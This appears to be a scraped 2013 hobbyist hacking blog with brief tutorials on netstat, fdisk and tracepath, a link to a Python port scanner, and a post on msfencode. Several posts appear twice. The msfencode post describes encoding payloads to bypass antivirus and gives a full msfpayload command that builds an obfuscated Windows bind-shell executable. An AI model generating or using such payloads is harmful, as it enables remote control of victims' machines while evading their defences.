Netstat (network statistics) is a command-line tool that displays network connections, routing tables, and a number of network interface, and network protocol statistics.
Netstat is available on Unix-like operating systems (linux, osx, bsd and others) and on Windows.
With options -i we can see the interface (eth0, wlan0, tun0 and so on) table : netstat -i
Instead with -r we can see the route table : netstat -r
With -s we can see the networking statistics : netstat -s:
ex :
Ip:
278821 total packets received
6 with invalid addresses
0 forwarded
0 incoming packets discarded
278815 incoming packets delivered
260870 requests sent out
248 outgoing packets dropped
2250 dropped because of missing route
You can also see Icmp, UDP, TCP ecc..
--numeric : don't resolve names
--numeric-hosts : don't resolve host names
--numeric-ports : don't resolve port names
--numeric-users : don't resolve user names
With -p we can display display PID/Program name for sockets : netstat -p
-l : see listening server socket : netstat -l
ex :
unix 2 [ ACC ] STREAM LISTENING 7053 @/tmp/dbus-xW2uFsRBZo
Instead -a to see all server socket.
For more informations type netstat -h
If you have any problem or you need some explanations just write under this post!
Saturday, May 11, 2013
portscan-python
Python portscan allows you to scan specify ports in an IP. For run portscan.py you must have python 2.x (x>4).
Check it out from here
Source code : http://pastebin.com/2iwkxxbc
Check it out from here
Source code : http://pastebin.com/2iwkxxbc
Monday, May 6, 2013
Fdisk
Fdisk is use to manipulate disk partition table
There is also a simply GUI of fidisk, cfdisk.
For run fdisk (or cfdisk) you need root user.
The device is usually /dev/sda, /dev/sdb, dev/sdc and so on for SCSI device instead for IDE device is usually /dev/hda, /dev/hdb and so on.
You can see your device on /dev (ls /dev).
Type - sudo fdisk /dev/sda - for use sda partition.
Now if you type p you can see your partition table.
If you type v you can verify the partition table, for example:
Remaining 62 unallocated 512-byte sectors
With d you can delete a parition instead with n you can create new partition.
If you create new partition you can choice if create primary partition of extended (max 4 primary partition!):
Partition type:
p primary (3 primary, 0 extended, 1 free)
e extended
For a complete list of command action type m.
You can specify some options when you run fdisk:
-b sectorsize: Specify the sector size of the disk. Valid values are 512, 1024, 2048 or 4096.
-c=mode: Specify the compatibility mode, 'dos' or 'nondos' (default c=nondos)
-l : List the partition tables for the specified devices and then exit.
-s partition: Print the size (in blocks) of each given partition.
ex : sudo fdisk -s /dev/sda1
9767488
sudo fdisk -s /dev/sda
156290904
If you have any problem or you need some explanations just write under this post!
There is also a simply GUI of fidisk, cfdisk.
For run fdisk (or cfdisk) you need root user.
The device is usually /dev/sda, /dev/sdb, dev/sdc and so on for SCSI device instead for IDE device is usually /dev/hda, /dev/hdb and so on.
You can see your device on /dev (ls /dev).
Type - sudo fdisk /dev/sda - for use sda partition.
Now if you type p you can see your partition table.
If you type v you can verify the partition table, for example:
Remaining 62 unallocated 512-byte sectors
With d you can delete a parition instead with n you can create new partition.
If you create new partition you can choice if create primary partition of extended (max 4 primary partition!):
Partition type:
p primary (3 primary, 0 extended, 1 free)
e extended
For a complete list of command action type m.
You can specify some options when you run fdisk:
-b sectorsize: Specify the sector size of the disk. Valid values are 512, 1024, 2048 or 4096.
-c=mode: Specify the compatibility mode, 'dos' or 'nondos' (default c=nondos)
-l : List the partition tables for the specified devices and then exit.
-s partition: Print the size (in blocks) of each given partition.
ex : sudo fdisk -s /dev/sda1
9767488
sudo fdisk -s /dev/sda
156290904
If you have any problem or you need some explanations just write under this post!
Saturday, May 4, 2013
Friday, May 3, 2013
Tracepath
tracepath is a tool used to traces path to a network host discovering MTU along this path.
The maximum transmission unit (MTU) is the size of the largest protocol data unit that the layer can pass onwards.
tracepath6 is used for IPv6, it is a replacement of traceroute6
Example : tracepath 127.0.0.1
1: localhost.localdomain 0.528ms reached
Resume: pmtu 65535 hops 1 back 64
You can see the TTL (time to live, is a mechanism that limits the lifespan or lifetime of data in a computer or network.)
With tracepath you can specify some options:
-n : Print primarily IP addresses numerically.
-b : Print both of host names and IP addresses.
-l : Sets the initial packet length (instead 65536 for tracepath and 128000 for tracepath6)
If you have any problem or you need some explanations just write under this post!
The maximum transmission unit (MTU) is the size of the largest protocol data unit that the layer can pass onwards.
tracepath6 is used for IPv6, it is a replacement of traceroute6
Example : tracepath 127.0.0.1
1: localhost.localdomain 0.528ms reached
Resume: pmtu 65535 hops 1 back 64
You can see the TTL (time to live, is a mechanism that limits the lifespan or lifetime of data in a computer or network.)
With tracepath you can specify some options:
-n : Print primarily IP addresses numerically.
-b : Print both of host names and IP addresses.
-l : Sets the initial packet length (instead 65536 for tracepath and 128000 for tracepath6)
If you have any problem or you need some explanations just write under this post!
Wednesday, May 1, 2013
msfencode
msfencode is used to encode our payload for bypass antivirus.
With -e we can specify the type of encoding, to see the list of avaible encoders type msfencode -l
With -l we can see the name of encoders, the rank and descripio for example:
Name: x86/shikata_ga_nai
Rank : Excellent
Description : Polymorphic XOR Additive Feedback Encoder
With -c we can specify how many times use the econder.
Now we must specify the type of payload for example pl,rb,java,c,exe and so on (for a complete list type msfencode -h).
How can we use msfencode with msfpayload?
Example: msfpayload windows/shell/bind_tcp LPORT=3333 RHOST=ip X | msfencode -e x86/shikata_ga_nai -c 20 -t exe -o /home/HackForLulz/payload.exe
With msfpayload we create a windows/shell/bind_tcp and we encode it with msfencode:
Encoder : x86/shikata_ga_nai
Numbers of encodings : 20
Type : exe
output : /home/HackForLulz/payload.exe
If you have any problems or you need some explanations just write under this post!
With -e we can specify the type of encoding, to see the list of avaible encoders type msfencode -l
With -l we can see the name of encoders, the rank and descripio for example:
Name: x86/shikata_ga_nai
Rank : Excellent
Description : Polymorphic XOR Additive Feedback Encoder
With -c we can specify how many times use the econder.
Now we must specify the type of payload for example pl,rb,java,c,exe and so on (for a complete list type msfencode -h).
How can we use msfencode with msfpayload?
Example: msfpayload windows/shell/bind_tcp LPORT=3333 RHOST=ip X | msfencode -e x86/shikata_ga_nai -c 20 -t exe -o /home/HackForLulz/payload.exe
With msfpayload we create a windows/shell/bind_tcp and we encode it with msfencode:
Encoder : x86/shikata_ga_nai
Numbers of encodings : 20
Type : exe
output : /home/HackForLulz/payload.exe
If you have any problems or you need some explanations just write under this post!
Subscribe to:
Posts (Atom)